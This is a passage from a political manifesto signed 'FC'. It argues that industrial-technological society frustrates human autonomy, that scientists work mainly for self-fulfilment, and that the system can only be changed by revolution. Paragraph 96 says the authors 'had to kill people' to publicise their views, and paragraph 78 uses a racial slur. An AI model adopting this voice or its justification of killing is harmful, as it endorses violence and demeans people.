are terrible sins in modern society. Would-be industrial
societies that have done a poor job of subordinating
personal or local loyalties to loyalty to the system are
usually very inefficient. (Look at Latin America.) Thus
an advanced industrial society can tolerate only those
small-scale communities that are emasculated, tamed and
made into tools of the system. [7]

53. Crowding, rapid change and the breakdown of
communities have been widely recognized as sources of
social problems. But we do not believe tbey are enough to
account for the extent of the problems that are seen
today.

54. A few pre-industrial cities were very large and
crowded, yet their inhabitants do not seem to have
suffered from psychological problems to the same extent
as modern man. In America today there still are uncrowded
rural areas, and we find there the same problems as in
urban areas, though the problems tend to be less acute in
the rural areas. Thus crowding does not seem to be the
decisive factor.

55. On the growing edge of the American frontier during
the 19th century, the mobility of the population probably
broke down extended families and small-scale social
groups to at least the same extent as these are broken
down today. In fact, many nuclear families lived by
choice in such isolation, having no neighbors within
several miles, that they belonged to no community at all,
yet they do not seem to have developed problems as a
result.

56. Furthermore, change in American frontier society was
very rapid and deep. A man might be born and raised in a
log cabin, outside the reach of law and order and fed
largely on wild meat; and by the time he arrived at old
age he might be working at a regular job and living in an
ordered community with effective law enforcement. This
was a deeper change than that which typically occurs in
the life of a modern individual, yet it does not seem to
have led to psychological problems. In fact, 19th century
American society had an optimistic and self-confident
tone, quite unlike that of today's society. [8]

57. The difference, we argue, is that modern man has the
sense (largely justified) that change is IMPOSED on him,
whereas the 19th century frontiersman had the sense (also
largely justified) that he created change himself, by his
own choice. Thus a pioneer settled on a piece of land of
his own choosing and made it into a farm through his own
effort. In those days an entire county might have only a
couple of hundred inhabitants and was a far more isolated
and autonomous entity than a modern county is. Hence the
pioneer farmer participated as a member of a relatively
small group in the creation of a new, ordered community.
One may well question whether the creation of this
community was an improvement, but at any rate it
satisfied the pioneer's need for the power process.

58. It would be possible to give other examples of
societies in which there has been rapid change and/or
lack of close community ties without the kind of massive
behavioral aberration that is seen in today's industrial
society. We contend that the most important cause of
social and psychological problems in modern society is
the fact that people have insufficient opportunity to go
through the power process in a normal way. We don't mean
to say that modern society is the only one in which the
power process has been disrupted. Probably most if not
all civilized societies have interfered with the power
process to a greater or lesser extent. But in modern
industrial society the problem has become particularly
acute. Leftism, at least in its recent (mid- to late-20th
century) form, is in part a symptom of deprivation with
respect to the power process.


DISRUPTION OF THE POWER PROCESS IN MODERN SOCIETY

59. We divide human drives into three groups: (1) those
drives that can be satisfied with minimal effort; (2)
those that can be satisfied but only at the cost of
serious effort; (3) those that cannot be adequately
satisfied no matter how much effort one makes. The power
process is the process of satisfying the drives of the
second group. The more drives there are in the third
group, the more there is frustration, anger, eventually
defeatism, depression, etc.

60. In modern industrial society natural human drives
tend to be pushed into the first and third groups, and
the second group tends to consist increasingly of
artificially created drives.

61. In primitive societies, physical necessities
generally fall into group 2: They can be obtained, but
only at the cost of serious effort. But modern society
tends to guaranty the physical necessities to everyone
[9] in exchange for only minimal effort, hence physical
needs are pushed into group 1. (There may be disagreement
about whether the effort needed to hold a job is
"minimal"; but usually, in lower- to middle-level jobs,
whatever effort is required is merely that of OBEDIENCE.
You sit or stand where you are told to sit or stand and
do what you are told to do in the way you are told to do
it. Seldom do you have to exert yourself seriously, and
in any case you have hardly any autonomy in work, so that
the need for the power process is not well served.)

62. Social needs, such as sex, love and status, often
remain in group 2 in modern society, depending on the
situation of the individual. [10] But, except for people
who have a particularly strong drive for status, the
effort required to fulfill the social drives is
insufficient to satisfy adequately the need for the power
process.

63. So certain artificial needs have been created that
fall into group 2, hence serve the need for the power
process. Advertising and marketing techniques have been
developed that make many people feel they need things
that their grandparents never desired or even dreamed of.
It requires serious effort to earn enough money to
satisfy these artificial needs, hence they fall into
group 2. (But see paragraphs 80-82.) Modern man must
satisfy his need for the power process largely through
pursuit of the artificial needs created by the
advertising and marketing industry [11], and through
surrogate activities.

64. It seems that for many people, maybe the majority,
these artificial forms of the power process are
insufficient. A theme that appears repeatediy in the
writings of the social critics of the second half of the
20th century is the sense of purposelessness that
afflicts many people in modern society. (This
purposelessness is often called by other names such as
"anomic" or "middle-class vacuity.") We suggest that the
so-called "identity crisis" is actually a search for a
sense of purpose, often for commitment to a suitable
surrogate activity. It may be that existentialism is in
large part a response to the purposelessness of modern
life. [12] Very widespread in modern society is the
search for "fulfillment." But we think that for the
majority of people an activity whose main goal is
fulfillment (that is, a surrogate activity) does not
bring completely satisfactory fulfillment. In other
words, it does not fully satisfy the need for the power
process. (See paragraph 41.) That need can be fully
satisfied only through activities that have some external
goal, such as physical necessities, sex, love, status,
revenge, etc.

65. Moreover, where goals are pursued through earning
money, climbing the status ladder or functioning as part
of the system in some other way, most people are not in
a position to pursue their goals AUTONOMOUSLY. Most
workers are someone else's employee and, as we pointed
out in paragraph 61, must spend their days doing what
they are told to do in the way they are told to do it.
Even people who are in business for themselves have only
limited autonomy. It is a chronic complaint of
small-business persons and entrepreneurs that their hands
are tied by excessive government regulation. Some of
these regulations are doubtless unnecessary, but for the
most part government regulations are essential and
inevitable parts of our extremely complex society. A
large portion of small business today operates on the
franchise system. It was reported in the Wall Street
Journal a few years ago that many of the
franchise-granting companies require applicants for
franchises to take a personality test that is designed to
EXCLUDE those who have creativity and initiative, because
such persons are not sufficiently docile to go along
obediently with the franchise system. This excludes from
small business many of the people who most need autonomy.

66. Today people live more by virtue of what the system
does FOR them or TO them than by virtue of what they do
for themselves. And what they do for themselves is done
more and more along channels laid down by the system.
Opportunities tend to be those that the system provides,
the opportunities must be exploited in accord with rules
and regulations [13], and techniques prescribed by
experts must be followed if there is to be a chance of
success.

67. Thus the power process is disrupted in our society
through a deficiency of real goals and a deficiency of
autonomy in the pursuit of goals. But it is also
disrupted because of those human drives that fall into
group 3: the drives that one cannot adequately satisfy no
matter how much effort one makes. One of these drives is
the need for security. Our lives depend on decisions made
by other people; we have no control over these decisions
and usually we do not even know the people who make them.
("We live in a world in which relatively few people --
maybe 500 or 1,000 make the important decisions" --
Philip B. Heymann of Harvard Law School, quoted by
Anthony Lewis, New York Times, April 21,1995.) Our lives
depend on whether safety standards at a nuclear power
plant are properly maintained; on how much pesticide is
allowed to get into our food or how much pollution into
our air; on how skillful (or incompetent) our doctor is;
whether we lose or get a job may depend on decisions made
by government economists or corporation executives; and
so forth. Most individuals are not in a position to
secure themselves against these threats to more [than] a
very limited extent. The individual's search for security
is therefore frustrated, which leads to a sense of
powerlessness.

68. It may be objected that primitive man is physically
less secure than modern man, as is shown by his shorter
life expectancy; hence modern man suffers from less, not
more than the amount of insecurity that is normal for
human beings. But psychological security does not closely
correspond with physical security. What makes us FEEL
secure is not so much objective security as a sense of
confidence in our ability to take care of ourselves.
Primitive man, threatened by a fierce animal or by
hunger, can fight in self-defense or travel in search of
food. He has no certainty of success in these efforts,
but he is by no means helpless against the things that
threaten him. The modern individual on the other hand is
threatened by many things against which he is helpless:
nuclear accidents, carcinogens in food, environmental
pollution, war, increasing taxes, invasion of his privacy
by large organizations, nationwide social or economic
phenomena that may disrupt his way of life.

69. It is true that primitive man is powerless against
some of the things that threaten him; disease for
example. But he can accept the risk of disease stoically.
It is part of the nature of things, it is no one's fault,
unless it is the fault of some imaginary, impersonal
demon. But threats to the modern individual tend to be
MAN-MADE. They are not the results of chance but are
IMPOSED on him by other persons whose decisions he, as an
individual, is unable to influence. Consequently he feels
frustrated, humiliated and angry.

70. Thus primitive man for the most part has his security
in his own hands (either as an individual or as a member
of a SMALL group) whereas the security of modern man is
in the hands of persons or organizations that are too
remote or too large for him to be able personally to
influence them. So modern man's drive for security tends
to fall into groups 1 and 3; in some areas (food, shelter
etc.) his security is assured at the cost of only trivial
effort, whereas in other areas he CANNOT attain security.
(The foregoing greatly simplifies the real situation, but
it does indicate in a rough, general way how the
condition of modern man differs from that of primitive
man.)

71. People have many transitory drives or impulses that
are necessarily frustrated in modern life, hence fall
into group 3. One may become angry, but modern society
cannot permit fighting. In many situations it does not
even permit verbal aggression. When going somewhere one
may be in a hurry, or one may be in a mood to travel
slowly, but one generally has no choice but to move with
the flow of traffic and obey the traffic signals. One may
want to do one's work in a different way, but usually one
can work only according to the rules laid down by one's
employer. In many other ways as well, modern man is
strapped down by a network of rules and regulations
(explicit or implicit) that frustrate many of his
impulses and thus interfere with the power process. Most
of these regulations cannot be dispensed with, because
they are necessary for the functioning of industrial
society.

72. Modern society is in certain respects extremely
permissive. In matters that are irrelevant to the
functioning of the system we can generally do what we
please. We can believe in any religion (as long as it
does not encourage behavior that is dangerous to the
system). We can go to bed with anyone we like (as long as
we practice "safe sex"). We can do anything we like as
long as it is UNIMPORTANT. But in all IMPORTANT matters
the system tends increasingly to regulate our behavior.

73. Behavior is regulated not only through explicit rules
and not only by the government. Control is often
exercised through indirect coercion or through
psychological pressure or manipulation, and by
organizations other than the government, or by the system
as a whole. Most large organizations use some form of
propaganda [14] to manipulate public attitudes or
behavior. Propaganda is not limited to "commercials" and
advertisements, and sometimes it is not even consciously
intended as propaganda by the people who make it. For
instance, the content of entertainment programming is a
powerful form of propaganda. An example of indirect
coercion: There is no law that says we have to go to work
every day and follow our employer's orders. Legally there
is nothing to prevent us from going to live in the wild
like primitive people or from going into business for
ourselves. But in practice there is very little wild
country left, and there is room in the economy for only
a limited number of small business owners. Hence most of
us can survive only as someone else's employee.

74. We suggest that modern man's obsession with
longevity, and with maintaining physical vigor and sexual
attractiveness to an advanced age, is a symptom of
unfulfillment resulting from deprivation with respect to
the power process. The "mid-lffe crisis" also is such a
symptom. So is the lack of interest in having children
that is fairly common in modern society but almost
unheard-of in primitive societies.

75. In primitive societies life is a succession of
stages. The needs and purposes of one stage having been
fulfilled, there is no particular reluctance about
passing on to the next stage. A young man goes through
the power process by becoming a hunter, hunting not for
sport or for fulfillment but to get meat that is
necessary for food. (In young women the process is more
complex, with greater emphasis on social power; we won't
discuss that here.) This phase having been successfully
passed through, the young man has no reluctance about
settling down to the responsibilities of raising a
family. (In contrast, some modern people indefinitely
postpone having children because they are too busy
seeking some kind of "fulfillment." We suggest that the
fulfillment they need is adequate experience of the power
process -- with real goals instead of the artificial
goals of surrogate activities.) Again, having
successfully raised his children, going through the power
process by providing them with the physical necessities,
the primitive man feels that his work is done and he is
prepared to accept old age (if he survives that long) and
death. any modern people, on the other hand, are
disturbed by the prospect of physical deterioration and
death, as is shown by the amount of effort they expend
trying to maintain their physical condition, appearance
and health. We argue that this is due to unfulfillment
resulting from the fact that they have never put their
physical powers to any practical use, have never gone
through the power process using their bodies in a serious
way. It is not the primitive man, who has used his body
daily for practical purposes, who fears the deterioration
of age, but the modern man, who has never had a practical
use for his body beyond walking from his car to his
house. It is the man whose need for the power process has
been satisfied during his life who is best prepared to
accept the end of that life.

76. In response to the arguments of this section someone
will say, "Society must find a way to give people the
opportunity to go through the power process." For such
people the value of the opportunity is destroyed by the
very fact that society gives it to them. What they need
is to find or make their own opportunities. As long as
the system GIVES them their opportunities it still has
them on a leash. To attain autonomy they must get off
that leash.


HOW SOME PEOPLE ADJUST

77. Not everyone in industrial-technological society
suffers from psychological problems. Some people even
profess to be quite satisfied with society as it is. We
now discuss some of the reasons why people differ so
greatly in their response to modern society.

78. First, there doubtless are differences in the
strength of the drive for power. Individuals with a weak
drive for power may have relatively little need to go
through the power process, or at least relatively little
need for autonomy in the power process. These are docile
types who would have been happy as plantation darkies in
the Old South. (We don't mean to sneer at the "plantation
darkies" of the Old South. To their credit, most of the
slaves were NOT content with their servitude. We do sneer
at people who ARE content with servitude.)

79. Some people may have some exceptional drive, in
pursuing which they satisfy their need for the power
process. For example, those who have an unusually strong
drive for social status may spend their whole lives
climbing the status ladder without ever getting bored
with that game.

80. People vary in their susceptibility to advertising
and marketing techniques. Some are so susceptible that,
even if they make a great deal of money, they cannot
satisfy their constant craving for the the shiny new toys
that the marketing industry dangles before their eyes. So
they always feel hard-pressed financially even if their
income is large, and their cravings are frustrated.

81. Some people have low susceptibility to advertising
and marketing techniques. These are the people who aren't
interested in money. Material acquisition does not serve
their need for the power process.

82. People who have medium susceptibility to advertising
and marketing techniques are able to earn enough money to
satisfy their craving for goods and services, but only at
the cost of serious effort (putting in overtime, taking
a second job, earning promotions, etc.). Thus material
acquisition serves their need for the power process. But
it does not necessarily follow that their need is fully
satisfied. They may have insufficient autonomy in the
power process (their work may consist of following
orders) and some of their drives may be frustrated (e.g.,
security, aggression). (We are guilty of
oversimplification in paragraphs 80-82 because we have
assumed that the desire for material acquisition is
entirely a creation of the advertising and marketing
industry. Of course it's not that simple. [11]

83. Some people partly satisfy their need for power by
identifying themselves with a powerful organization or
mass movement. An individual lacking goals or power joins
a movement or an organization, adopts its goals as his
own, then works toward those goals. When some of the
goals are attained, the individual, even though his
personal efforts have played only an insignificant part
in the attainment of the goals, feels (through his
identification with the movement or organization) as if
he had gone through the power process. This phenomenon
was exploited by the fascists, nazis and communists. Our
society uses it too, though less crudely. Example: Manuel
Noriega was an irritant to the U.S. (goal: punish
Noriega). The U.S. invaded Panama (effort) and punished
Noriega (attainment of goal). Thus the U.S. went through
the power process and many Americans, because of their
identification with the U.S., experienced the power
process vicariously. Hence the widespread public approval
of the Panama invasion; it gave people a sense of power.
[15] We see the same phenomenon in armies, corporations,
political parties, humanitarian organizations, religious
or ideological movements. In particular, leftist
movements tend to attract people who are seeking to
satisfy their need for power. But for most people
identification with a large organization or a mass
movement does not fully satisfy the need for power.

84. Another way in which people satisfy their need for
the power process is through surrogate activities. As we
explained in paragraphs 38-40, a surrogate activity is an
activity that is directed toward an artificial goal that
the individual pursues for the sake of the "fulfillment"
that he gets from pursuing the goal, not because he needs
to attain the goal itself. For instance, there is no
practical motive for building enormous muscles, hitting
a little ball into a hole or acquiring a complete series
of postage stamps. Yet many people in our society devote
themselves with passion to bodybuilding, golf or
stamp-collecting. Some people are more "other-directed"
than others, and therefore will more readily attach
importance to a surrogate activity simply because the
people around them treat it as important or because
society tells them it is important. That is why some
people get very serious about essentially trivial
activities such as sports, or bridge, or chess, or arcane
scholarly pursuits, whereas others who are more
clear-sighted never see these things as anything but the
surrogate activities that they are, and consequently
never attach enough importance to them to satisfy their
need for the power process in that way. It only remains
to point out that in many cases a person's way of earning
a living is also a surrogate activity. Not a PURE
surrogate activity, since part of the motive for the
activity is to gain the physical necessities and (for
some people) social status and the luxuries that
advertising makes them want. But many people put into
their work far more effort than is necessary to earn
whatever money and status they require, and this extra
effort constitutes a surrogate activity. This extra
effort, together with the emotional investment that
accompanies it, is one of the most potent forces acting
toward the continual development and perfecting of the
system, with negative consequences for individual freedom
(see paragraph 131). Especially, for the most creative
scientists and engineers, work tends to be largely a
surrogate activity. This point is so important that it
deserves a separate discussion, which we shall give in a
moment (paragraphs 87-92).

85. In this section we have explained how many people in
modern society do satisfy their need for the power
process to a greater or lesser extent. But we think that
for the majority of people the need for the power process
is not fully satisfied. In the first place, those who
have an insatiable drive for status, or who get firmly
"hooked" on a surrogate activity, or who identify
strongly enough with a movement or organization to
satisfy their need for power in that way, are exceptional
personalities. Others are not fully satisfied with
surrogate activities or by identification with an
organization (see paragraphs 41, 64). In the second
place, too much control is imposed by the system through
explicit regulation or through socialization, which
results in a deficiency of autonomy, and in frustration
due to the impossibility of attaining certain goals and
the necessity of restraining too many impulses.

86. But even if most people in industrial-technological
society were well satisfied, we (FC) would still be
opposed to that form of society, because (among other
reasons) we consider it demeaning to fulfill one's need
for the power process through surrogate activities or
through identification with an organization, rather than
through pursuit of real goals.


THE MOTIVES OF SCIENTISTS

87. Science and technology provide the most important
examples of surrogate activities. Some scientists claim
that they are motivated by "curiosity" or by a desire to
"benefit humanity." But it is easy to see that neither of
these can be the principal motive of most scientists. As
for "curiosity," that notion is simply absurd. Most
scientists work on highly specialized problems that are
not the object of any normal curiosity. For example, is
an astronomer, a mathematician or an entomologist curious
about the properties of isopropyltrimethylmethane? Of
course not. Only a chemist is curious about such a thing,
and he is curious about it only because chemistry is his
surrogate activity. Is the chemist curious about the
appropriate classification of a new species of beetle?
No. That question is of interest only to the
entomologist, and he is interested in it only because
entomology is his surrogate activity. If the chemist and
the entomologist had to exert themselves seriously to
obtain the physical necessities, and if that effort
exercised their abilities in an interesting way but in
some nonscientific pursuit, then they wouldn't give a
damn about isopropyltrimethylmethane or the
classification of beetles. Suppose that lack of funds for
postgraduate education had led the chemist to become an
insurance broker instead of a chemist. In that case he
would have been very interested in insurance matters but
would have cared nothing about isopropyltrimethylmethane.
In any case it is not normal to put into the satisfaction
of mere curiosity the amount of time and effort that
scientists put into their work. The "curiosity"
explanation for the scientists' motive just doesn't stand
up.

88. The "benefit of humanity" explanation doesn't work
any better. Some scientific work has no conceivable
relation to the welfare of the human race most of
archaeology or comparative linguistics for example. Some
other areas of science present obviously dangerous
possibilities. Yet scientists in these areas are just as
enthusiastic about their work as those who develop
vaccines or study air pollution. Consider the case of Dr.
Edward Teller, who had an obvious emotional involvement
in promoting nuclear power plants. Did this involvement
stem from a desire to benefit humanity? If so, then why
didn't Dr. Teller get emotional about other
"humanitarian" causes? If he was such a humanitarian then
why did he help to develop the H-bomb? As with many other
scientific achievements, it is very much open to question
whether nuclear power plants actually do benefit
humanity. Does the cheap electricity outweigh the
accumulating waste and the risk of accidents? Dr. Teller
saw only one side of the question. Clearly his emotional
involvement with nuclear power arose not from a desire to
"benefit humanity" but from a personal fulfillment he got
from his work and from seeing it put to practical use.

89. The same is true of scientists generally. With
possible rare exceptions, their motive is neither
curiosity nor a desire to benefit humanity but the need
to go through the power process: to have a goal (a
scientific problem to solve), to make an effort
(research) and to attain the goal (solution of the
problem.) Science is a surrogate activity because
scientists work mainly for the fulfillment they get out
of the work itself.

90. Of course, it's not that simple. Other motives do
play a role for many scientists. Money and status for
example. Some scientists may be persons of the type who
have an insatiable drive for status (see paragraph 79)
and this may provide much of the motivation for their
work. No doubt the majority of scientists, like the
majority of the general population, are more or less
susceptible to advertising and marketing techniques and
need money to satisfy their craving for goods and
services. Thus science is not a PURE surrogate activity.
But it is in large part a surrogate activity.

91. Also, science and technology constitute a power mass
movement, and many scientists gratify their need for
power through identification with this mass movement (see
paragraph 83).

92. Thus science marches on blindly, without regard to
the real welfare of the human race or to any other
standard, obedient only to the psychological needs of the
scientists and of the government of ficials and
corporation executives who provide the funds for
research.


THE NATURE OF FREEDOM

93. We are going to argue that industrial-technological
society cannot be reformed in such a way as to prevent it
from progressively narrowing the sphere of human freedom.
But, because "freedom" is a word that can be interpreted
in many ways, we must first make clear what kind of
freedom we are concerned with.

94. By "freedom" we mean the opportunity to go through
the power process, with real goals not the artificial
goals of surrogate activities, and without interference,
manipulation or supervision from anyone, especially from
any large organization. Freedom means being in control
(either as an individual or as a member of a SMALL group)
of the life-and-death issues of one's existence; food,
clothing, shelter and defense against whatever threats
there may be in one's environment. Freedom means having
power; not the power to control other people but the
power to control the circumstances of one's own life. One
does not have freedom if anyone else (especially a large
organization) has power over one, no matter how
benevolently, tolerantly and permissively that power may
be exercised. It is important not to confuse freedom with
mere permissiveness (see paragraph 72).

95. It is said that we live in a free society because we
have a certain number of constitutionally guaranteed
rights. But these are not as important as they seem. The
degree of personal freedom that exists in a society is
determined more by the economic and technological
structure of the society than by its laws or its form of
government. [16] Most of the Indian nations of New
England were monarchies, and many of the cities of the
Italian Renaissance were controlled by dictators. But in
reading about these societies one gets the impression
that they allowed far more personal freedom than our
society does. In part this was because they lacked
efficient mechanisms for enforcing the ruler's will:
There were no modern, well-organized police forces, no
rapid long-distance communications, no surveillance
cameras, no dossiers of information about the lives of
average citizens. Hence it was relatively easy to evade
control.

96. As for our constitutional rights, consider for
example that of freedom of the press. We certainly don't
mean to knock that right; it is very important tool for
limiting concentration of political power and for keeping
those who do have political power in line by publicly
exposing any misbehavior on their part. But freedom of
the press is of very little use to the average citizen as
an individual. The mass media are mostly under the
control of large organizations that are integrated into
the system. Anyone who has a little money can have
something printed, or can distribute it on the Internet
or in some such way, but what he has to say will be
swamped by the vast volume of material put out by the
media, hence it will have no practical effect. To make an
impression on society with words is therefore almost
impossible for most individuals and small groups. Take us
(FC) for example. If we had never done anything violent
and had submitted the present writings to a publisher,
they probably would not have been accepted. If they had
been been accepted and published, they probably would not
have attracted many readers, because it's more fun to
watch the entertainment put out by the media than to read
a sober essay. Even ff these writings had had many
readers, most of these readers would soon have forgotten
what they had read as their minds were flooded by the
mass of material to which the media expose them. In order
to get our message before the public with some chance of
making a lasting impression, we've had to kill people.

97. Constitutional rights are useful up to a point, but
they do not serve to guarantee much more than what might
be called the bourgeois conception of freedom. According
to the bourgeois conception, a "free" man is essentially
an element of a social machine and has only a certain set
of prescribed and delimited freedoms; freedoms that are
designed to serve the needs of the social machine more
than those of the individual. Thus the bourgeois's "free"
man has economic freedom because that promotes growth and
progress; he has freedom of the press because public
criticism restrains misbehavior by political leaders; he
has a right to a fair trial because imprisonment at the
whim of the powerful would be bad for the system. This
was clearly the attitude of Simon Bolivar. To him, people
deserved liberty only if they used it to promote progress
(progress as conceived by the bourgeois). Other bourgeois
thinkers have taken a similar view of freedom as a mere
means to collective ends. Chester C. Tan, "Chinese
Political Thought in the Twentieth Century," page 202,
explains the philosophy of the Kuomintang leader Hu
Han-min: "An individual is granted rights because he is
a member of society and his community life requires such
rights. By community Hu meant the whole society of the
nation." And on page 259 Tan states that according to
Carsum Chang (Chang Chun-mai, head of the State Socialist
Party in China) freedom had to be used in the interest of
the state and of the people as a whole. But what kind of
freedom does one have if one can use it only as someone
else prescribes? FC's conception of freedom is not that
of Bolivar, Hu, Chang or other bourgeois theorists. The
trouble with such theorists is that they have made the
development and application of social theories their
surrogate activity. Consequently the theories are
designed to serve the needs of the theorists more than
the needs of any people who may be unlucky enough to live
in a society on which the theories are imposed.

98. One more point to be made in this section: It should
not be assumed that a person has enough freedom just
because he SAYS he has enough. Freedom is restricted in
part by psychological controls of which people are
unconscious, and moreover many people's ideas of what
constitutes freedom are governed more by social
convention than by their real needs. For example, it's
likely that many leftists of the oversocialized type
would say that most people, including themselves, are
socialized too little rather than too much, yet the
oversocialized leftist pays a heavy psychological price
for his high level of socialization.


SOME PRINCIPLES OF HISTORY

99. Think of history as being the sum of two components:
an erratic component that consists of unpredictable
events that follow no discernible pattern, and a regular
component that consists of long-term historical trends.
Here we are concerned with the long-term trends.

100. FIRST PRINCIPLE. If a SMALL change is made that
affects a long-term historical trend, then the effect of
that change will almost always be transitory -- the trend
will soon revert to its original state. (Example: A
reform movement designed to clean up political corruption
in a society rarely has more than a short-term effect;
sooner or later the reformers relax and corruption creeps
back in. The level of political corruption in a given
society tends to remain constant, or to change only
slowly with the evolution of the society. Normally, a
political cleanup will be permanent only if accompanied
by widespread social changes; a SMALL change in the
society won't be enough.) If a small change in a
long-term historical trend appears to be permanent, it is
only because the change acts in the direction in which
the trend is already moving, so that the trend is not
altered by only pushed a step ahead.

101. The first principle is almost a tautology. If a
trend were not stable with respect to small changes, it
would wander at random rather than following a definite
direction; in other words it would not be a long-term
trend at all.


102. SECOND PRINCIPLE. If a change is made that is
sufficiently large to alter permanently a long-term
historical trend, then it will alter the society as a
whole. In other words, a society is a system in which all
parts are interrelated, and you can't permanently change
any important part without changing all other parts as
well.

103. THIRD PRINCIPLE. If a change is made that is large
enough to alter permanently a long-term trend, then the
consequences for the society as a whole cannot be
predicted in advance. (Unless various other societies
have passed through the same change and have all
experienced the same consequences, in which case one can
predict on empirical grounds that another society that
passes through the same change will be like to experience
similar consequences.)

104. FOURTH PRINCIPLE. A new kind of society cannot be
designed on paper. That is, you cannot plan out a new
form of society in advance, then set it up and expect it
to function as it was designed to do.

105. The third and fourth principles result from the
complexity of human societies. A change in human behavior
will affect the economy of a society and its physical
environment; the economy will affect the environment and
vice versa, and the changes in the economy and the
environment will affect human behavior in complex,
unpredictable ways; and so forth. The network of causes
and effects is far too complex to be untangled and
understood.

106. FIFTH PRINCIPLE. People do not consciously and
rationally choose the form of their society. Societies
develop through processes of social evolution that are
not under rational human control.

107. The fifth principle is a consequence of the other
four.

108. To illustrate: By the first principle, generally
speaking an attempt at social reform either acts in the
direction in which the society is developing anyway (so
that it merely accelerates a change that would have
occurred in any case) or else it has only a transitory
effect, so that the society soon slips back into its old
groove. To make a lasting change in the direction of
development of any important aspect of a society, reform
is insufficient and revolution is required. (A revolution
does not necessarily involve an armed uprising or the
overthrow of a government.) By the second principle, a
revolution never changes only one aspect of a society, it
changes the whole society; and by the third principle
changes occur that were never expected or desired by the
revolutionaries. By the fourth principle, when
revolutionaries or utopians set up a new kind of society,
it never works out as planned.

109. The American Revolution does not provide a
counterexample. The American "Revolution" was not a
revolution in our sense of the word, but a war of
independence followed by a rather far-reaching political
reform.  The Founding Fathers did not change the
direction of development of American society, nor did
they aspire to do so. They only freed the development of
American society from the retarding effect of British
rule. Their political reform did not change any basic
trend, but only pushed American political culture along
its natural direction of development. British society, of
which American society was an offshoot, had been moving
for a long time in the direction of representative
democracy. And prior to the War of Independence the
Americans were already practicing a significant degree of
representative democracy in the colonial assemblies. The
political system established by the Constitution was
modeled on the British system and on the colonial
assemblies. With major alteration, to be sure -- there is
no doubt that the Founding Fathers took a very important
step. But it was a step along the road that
English-speaking world was already traveling. The proof
is that Britain and all of its colonies that were
populated predominantly by people of British descent
ended up with systems of representative democracy
essentially similar to that of the United States. If the
Founding Fathers had lost their nerve and declined to
sign the Declaration of Independence, our way of lffe
today would not have been significantly different. Maybe
we would have had somewhat closer ties to Britain, and
would have had a Parliament and Prime Minister instead of
a Congress and President. No big deal. Thus the American
Revolution provides not a counterexample to our
principles but a good illustration of them.

110. Still, one has to use common sense in applying the
principles. They are expressed in imprecise language that
allows latitude for interpretation, and exceptions to
them can be found. So we present these principles not as
inviolable laws but as rules of thumb, or guides to
thinking, that may provide a partial antidote to naive
ideas about the future of society. The principles should
be borne constantly in mind, and whenever one reaches a
conciusion that conflicts with them one should carefully
reexamine one's thinking and retain the conclusion only
if one has good, solid reasons for doing so.


INDUSTRIAL-TECHNOLOGICAL SOCIETY CANNOT BE REFORMED

111. The foregoing principles help to show how hopelessly
difficult it would be to reform the industrial system in
such a way as to prevent it from progressively narrowing
our sphere of freedom. There has been a consistent
tendency, going back at least to the Industrial
Revolution for technology to strengthen the system at a
high cost in individual freedom and local autonomy. Hence
any change designed to protect freedom from technology
would be contrary to a fundamental trend in the
development of our society. Consequently, such a change
either would be a transitory one -- soon swamped by the
tide of history -- or, if large enough to be permanent
would alter the nature of our whole society. This by the
first and second principles. Moreover, since society
would be altered in a way that could not be predicted in
advance (third principle) there would be great risk.
Changes large enough to make a lasting difference in
favor of freedom would not be initiated because it would
be realized that they would gravely disrupt the system.
So any attempts at reform would be too timid to be
effective. Even if changes large enough to make a lasting
difference were initiated, they would be retracted when
their disruptive effects became apparent. Thus, permanent
changes in favor of freedom could be brought about only
by persons prepared to accept radical, dangerous and
unpredictable alteration of the entire system. In other
words by revolutionaries, not reformers.

112. People anxious to rescue freedom without sacrificing
the supposed benefits of technology will suggest naive
schemes for some new form of society that would reconcile
freedom with technology. Apart from the fact that people
who make such suggestions seldom propose any practical
means by which the new form of society could be set up in
the first place, it follows from the fourth principle
that even if the new form of society could be once
established, it either would collapse or would give
results very different from those expected.

113. So even on very general grounds it seems highly
improbable that any way of changing society could be
found that would reconcile freedom with modern
technology. In the next few sections we will give more
specific reasons for concluding that freedom and
technological progress are incompatible.


RESTRICTION OF FREEDOM IS UNAVOIDABLE IN INDUSTRIAL
SOCIETY

114. As explained in paragraphs 65-67, 70-73, modern man
is strapped down by a network of rules and regulations,
and his fate depends on the actions of persons remote
from him whose decisions he cannot influence. This is not
accidental or a result of the arbitrariness of arrogant
bureaucrats. It is necessary and inevitable in any
technologically advanced society. The system HAS TO
regulate human behavior closely in order to function. At
work people have to do what they are told to do,
otherwise production would be thrown into chaos.
Bureaucracies HAVE TO be run according to rigid rules. To
allow any substantial personal discretion to lower-level
bureaucrats would disrupt the system and lead to charges
of unfairness due to differences in the way individual
bureaucrats exercised their discretion. It is true that
some restrictions on our freedom could be eliminated, but
GENERALLY SPEAKING the regulation of our lives by large
organizations is necessary for the functioning of
industrial-technological society. The result is a sense
of powerlessness on the part of the average person. It
may be, however, that formal regulations will tend
increasingly to be replaced by psychological tools that
make us want to do what the system requires of us.
(Propaganda [14], educational techniques, "mental health"
programs, etc.)

115. The system HAS TO force people to behave in ways
that are increasingly remote from the natural pattern of
human behavior. For example, the system needs scientists,
mathematicians and engineers. It can't function without
them. So heavy pressure is put on children to excel in
these fields. It isn't natural for an adolescent human
being to spend the bulk of his time sitting at a desk
absorbed in study. A normal adolescent wants to spend his
time in active contact with the real world. Among
primitive peoples the things that children are trained to
do tend to be in reasonable harmony with natural human
impulses. Among the American Indians, for example, boys
were trained in active outdoor pursuits -- just the sort
of thing that boys like. But in our society children are
pushed into studying technical subjects, which most do
grudgingly.

[[116 not used.]]

117. In any technologically advanced society the
individual's fate MUST depend on decisions that he
personally cannot influence to any great extent. A
technological society cannot be broken down into small,
autonomous communities, because production depends on the
cooperation of very large numbers of people. When a
decision affects, say, a million people, then each of the
affected individuals has, on the average, only a
one-millionth share in making the decision. What usually
happens in practice is that decisions are made by public
officials or corporation executives, or by technical
specialists, but even when the public votes on a decision
the number of voters ordinarily is too large for the vote
of any one individual to be significant. [17] Thus most
individuals are unable to influence measurably the major
decisions that affect their lives. There is no
conceivable way to remedy this in a technologically
advanced society. The system tries to "solve" this
problem by using propaganda to make people WANT the
decisions that have been made for them, but even if this
"solution" were completely successful in making people
feel better, it would be demeaning.

118. Conservatives and some others advocate more "local
autonomy." Local communities once did have autonomy, but
such autonomy becomes less and less possible as local
communities become more enmeshed with and dependent on
large-scale systems like public utilities, computer
networks, highway systems, the mass communications media,
the modern health care system. Also operating against
autonomy is the fact that technology applied in one
location often affects people at other locations far way.
Thus pesticide or chemical use near a creek may
contaminate the water supply hundreds of miles
